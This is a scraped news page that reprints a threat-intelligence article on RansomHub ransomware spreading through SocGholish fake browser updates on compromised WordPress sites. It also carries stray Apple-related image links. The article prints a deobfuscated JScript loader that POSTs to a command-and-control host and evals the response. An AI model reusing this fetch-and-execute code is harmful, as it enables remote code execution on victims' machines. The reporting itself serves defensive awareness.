![[The AI Show Episode 143]: ChatGPT Revenue Surge, New AGI Timelines, Amazon’s AI Agent, Claude for Education, Model Context Protocol & LLMs Pass the Turing Test](https://www.marketingaiinstitute.com/hubfs/ep%20143%20cover.png)
_Muhammad_R._Fakhrurrozi_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
_NicoElNino_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![macOS 15.5 beta 4 now available for download [U]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/04/macOS-Sequoia-15.5-b4.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![AirPods Pro 2 With USB-C Back On Sale for Just $169! [Deal]](https://www.iclarified.com/images/news/96315/96315/96315-640.jpg)
![Apple Releases iOS 18.5 Beta 4 and iPadOS 18.5 Beta 4 [Download]](https://www.iclarified.com/images/news/97145/97145/97145-640.jpg)
![Apple Seeds watchOS 11.5 Beta 4 to Developers [Download]](https://www.iclarified.com/images/news/97147/97147/97147-640.jpg)
![Apple Seeds visionOS 2.5 Beta 4 to Developers [Download]](https://www.iclarified.com/images/news/97150/97150/97150-640.jpg)
![Apple Seeds Fourth Beta of iOS 18.5 to Developers [Update: Public Beta Available]](https://images.macrumors.com/t/uSxxRefnKz3z3MK1y_CnFxSg8Ak=/2500x/article-new/2025/04/iOS-18.5-Feature-Real-Mock.jpg)
![Apple Seeds Fourth Beta of macOS Sequoia 15.5 [Update: Public Beta Available]](https://images.macrumors.com/t/ne62qbjm_V5f4GG9UND3WyOAxE8=/2500x/article-new/2024/08/macOS-Sequoia-Night-Feature.jpg)
RansomHub Ransomware Deploying Malware to Compromise Corporate Networks
A new Ransomware-as-a-Service (RaaS) group called RansomHub emerged in the cybercriminal ecosystem, specializing in targeting high-profile organizations through sophisticated attack vectors. The group advertises its criminal services on the Russian Anonymous Market Place (RAMP), a notorious Dark Web forum known for hosting various cybercriminal activities. RansomHub has quickly established itself as a formidable threat to […] The post RansomHub Ransomware Deploying Malware to Compromise Corporate Networks appeared first on Cyber Security News.
A new Ransomware-as-a-Service (RaaS) group called RansomHub emerged in the cybercriminal ecosystem, specializing in targeting high-profile organizations through sophisticated attack vectors.
The group advertises its criminal services on the Russian Anonymous Market Place (RAMP), a notorious Dark Web forum known for hosting various cybercriminal activities.
RansomHub has quickly established itself as a formidable threat to corporate networks worldwide through its multi-stage attack methodology and evasive techniques.
The ransomware group operates by deploying SocGholish (also known as FakeUpdates) malware as an initial access vector, which then collects detailed system information before deploying a python-based backdoor.
This reconnaissance activity enables threat actors to strategically evaluate potential victims, allowing them to focus their efforts on high-value targets while effectively evading security researchers and sandbox environments.
Esentire’s Threat Response Unit (TRU) identified a significant cyberattack using this exact methodology in early March 2025.
Researchers noted that RansomHub affiliates were strategically choosing targets after the initial compromise, with approximately 6.5 minutes elapsing between the first contact with the command and control server and the delivery of the python backdoor.
Infection chain
The infection chain begins with victims visiting a compromised WordPress site that displays a page instructing them to update their browser.
Upon downloading the malicious “Update.zip” file, users unknowingly execute a SocGholish JScript file that initiates communication with the attacker’s command and control infrastructure.
The infection mechanism employs a sophisticated multi-stage approach where each component serves a specific purpose in the attack chain.
.webp)
Initial access occurs when victims visit a compromised website (in the documented case, “butterflywonderland[.]com”) and are prompted to update Microsoft Edge.
The downloaded “Update.zip” contains “Update.js,” a JScript file that sends a POST request to the SocGholish C2 server at “hxxps://exclusive.nobogoods[.]com/updateStatus” to retrieve the next stage of the attack.
The deobfuscated code from this initial stage reveals how the malware establishes persistence:-
var a0_0x11d8eb = new ActiveXObject("MSXML2.XMLHTTP");
a0_0x11d8eb.open("POST", "https://exclusive.nobogoods[.]com/profileLayout", true);
a0_0x11d8eb.send("m29Q00a/f6CPLnKzgumo/nA1jnhP0S5dlEw1uB21Cw==");
while (true) {
WSH.Sleep(0x3e8);
if (a0_0x11d8eb.readyState == 0x4) {
eval(a0_0x11d8eb.responseText);
break;
}
}After collecting system information, the malware executes LOLBin commands like “net use” and “systeminfo” to gather additional intelligence about the compromised environment.
The collected data is encoded and transmitted back to the command and control server, which then determines if the victim is a valuable target.
For selected targets, the attackers deploy a python backdoor that establishes a SOCKS proxy, allowing threat actors to perform reconnaissance and lateral movement throughout the victim’s network.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post RansomHub Ransomware Deploying Malware to Compromise Corporate Networks appeared first on Cyber Security News.
